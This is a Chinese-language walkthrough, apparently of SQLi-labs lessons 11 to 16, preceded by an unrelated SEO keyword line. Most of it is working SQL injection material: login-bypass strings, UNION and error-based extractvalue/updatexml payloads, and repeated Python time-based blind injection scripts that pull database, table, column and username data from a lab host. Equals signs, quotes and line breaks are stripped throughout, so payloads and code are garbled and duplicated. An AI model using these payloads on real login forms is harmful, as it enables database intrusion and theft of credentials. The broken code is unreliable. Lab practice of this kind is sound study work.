企业买好域名后怎么做网站,廊坊做网站公司哪家好,wordpress游戏主题,wordpress app中文版11.
看到登录框直接or 11 在hackerabar中我们可以看到这里是post传递的数据#xff0c;在get中用--来注释后面的内容 因为get中#是用来指导浏览器动作的#xff0c;--代表注释是空格#xff0c;所以这里用#
之后就和get的一样了 1 order by 2 # order by 3报错
联合注入 …11.
看到登录框直接or 11 在hackerabar中我们可以看到这里是post传递的数据在get中用--来注释后面的内容 因为get中#是用来指导浏览器动作的--代表注释是空格所以这里用#
之后就和get的一样了 1 order by 2 # order by 3报错
联合注入 1 union select 1,2 # 1‘ union select database(),2# 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemasecurity # 1 union select 1,group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers# 1 union select 1,group_concat(username) from security.users #
12. 1没反应尝试” 通过“尝试得到报错知道还要 1) or 11 #
之后一样’ 1) union select 1,2 # 1) union select 1,database() # 1) union select 1,group_concat(table_name) from information_schema.tables where table_schemasecurity # 1) union select 1,group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers# 1) union select 1,group_concat(username) from security.users #
13. 1‘尝试出现报错知道是1’ 显示登录成功但不会出现提示但是有报错信息使用报错注入这里使用报错注入我们使用两种报错注入方法
1) and extractvalue(1,concat(0x5c,database()))#
1) and updatexml(1,concat(0x7e,database(),0x7e),1) # 注入得到表名 1) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),0x7e),1)#1) and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schemasecurity))) # 注入的列名
1) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),0x7e),1)
1) and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers)))# 注入的数据
1) and updatexml(1,concat(0x7e,(select group_concat(username) from security.users ),0x7e),1)
1) and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))# 14.
对输入框测试发现当输入1“ or 11 #登录成功 使用报错注入
1 and updatexml(1,concat(0x7e,database(),0x7e),1)#
1 and extractvalue(1,concat(0x5c,database()))# 得到数据库库名
1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),0x7e),1)#
1 and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schemasecurity)))# 得到表名
1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),0x7e),1)#
1 and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers)))# 得到列名
1 and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
1 and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))# 15.
当1’ or 11#返回登录成功 这里看到如果输入的为错则返回登录失败不会出现报错信息使用布尔盲注
这里我们要知道and 和or的区别 and两边的条件都为真才会执行 or一边为真就会执行而这里我们如果没有爆破过用户admin也不在username中那我们就只能使用or这里的登录框根据经验第一个肯定是获取username的
admin and (substr(database(),1,1)s)#
1 or (substr(database(),1,1)s)# 1 or (substr(database(),1,1)a)# 这里成功和失败只会返回不同的照片对于脚本来说没有很明显的特征我们使用sleep来写脚本 import requests,time
def database():data_base charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr(database(),{len(data_base) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_stime time.time()rsp_time end_stime - start_time#print(f耗时:{rsp_time})if rsp_time 2:data_base charprint(f数据库名为:{data_base})breakelse:breakreturn data_basedatas database()
print(f最终数据库名为:{datas})
1 or if(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity limit 0,1),1,1)e,sleep(5),0)# def tablename():table_name charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),{len(table_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_stime time.time()rsp_time end_stime - start_timeif rsp_time 2:table_name charprint(f表名为:{table_name})breakelse:breakreturn table_nametables tablename()
print(f最终表名为:{tables}) 1 or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),1,1)i,sleep(5),0)# def columnname():column_name charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),{len(column_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:column_name charprint(f列名为:{column_name})breakelse:breakreturn column_namecolumns columnname()
print(f最终列名为:{columns})
1 or if(substr((select username from security.users limit 0,1),1,1)d,sleep(5),0)# def data():data charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select username from security.users limit 0,1),{len(data) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data charprint(f数据为:{data})breakelse:breakreturn datadatadata data()
print(f最终数据为:{datadata})
import requests,time
def database():data_base charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr(database(),{len(data_base) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_stime time.time()rsp_time end_stime - start_time#print(f耗时:{rsp_time})if rsp_time 2:data_base charprint(f数据库名为:{data_base})breakelse:breakreturn data_basedatas database()
print(f最终数据库名为:{datas})def tablename():table_name charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),{len(table_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_stime time.time()rsp_time end_stime - start_timeif rsp_time 2:table_name charprint(f表名为:{table_name})breakelse:breakreturn table_nametables tablename()
print(f最终表名为:{tables})def columnname():column_name charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),{len(column_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:column_name charprint(f列名为:{column_name})breakelse:breakreturn column_name
columns columnname()
print(f最终列名为:{columns})def data():data charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select username from security.users limit 0,1),{len(data) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data charprint(f数据为:{data})breakelse:breakreturn datadatadata data()
print(f最终数据为:{datadata})
16.
测试发现1 or 11 #时登录成功 1) or if(substr(database(),1,1)s,sleep(5),0 )# import requests,timedef dataname():data_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr(database(),{len(data_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data_name charprint(f数据库为{data_name})breakelse:breakreturn data_namedatas dataname()
print(f最终数据名为{datas}) 1) or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),1,1)e,sleep(5),0)# def tablename():table_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),{len(table_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:table_name charprint(f表名为{table_name})breakelse:breakreturn table_nametables tablename()
print(f最终表名为{tables}) 1) or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),1,1)i,sleep(5),0)# def columnname():column_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),{len(column_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:column_name charprint(f字段名为{column_name})breakelse:breakreturn column_name columns columnname()
print(f最终字段名为{columns}) 1) or if(substr((select username from security.users limit 0,1),1,1)d,sleep(5),0)# def data():data chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select username from security.users limit 0,1),{len(data) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data charprint(f数据为{data})breakelse:breakreturn datadatas data()
print(f最终数据为{datas}) 最终脚本
import requests,timedef dataname():data_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr(database(),{len(data_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data_name charprint(f数据库为{data_name})breakelse:breakreturn data_namedatas dataname()
print(f最终数据名为{datas})def tablename():table_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),{len(table_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:table_name charprint(f表名为{table_name})breakelse:breakreturn table_nametables tablename()
print(f最终表名为{tables})def columnname():column_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),{len(column_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:column_name charprint(f字段名为{column_name})breakelse:breakreturn column_name columns columnname()
print(f最终字段名为{columns})def data():data chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select username from security.users limit 0,1),{len(data) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data charprint(f数据为{data})breakelse:breakreturn datadatas data()
print(f最终数据为{datas})
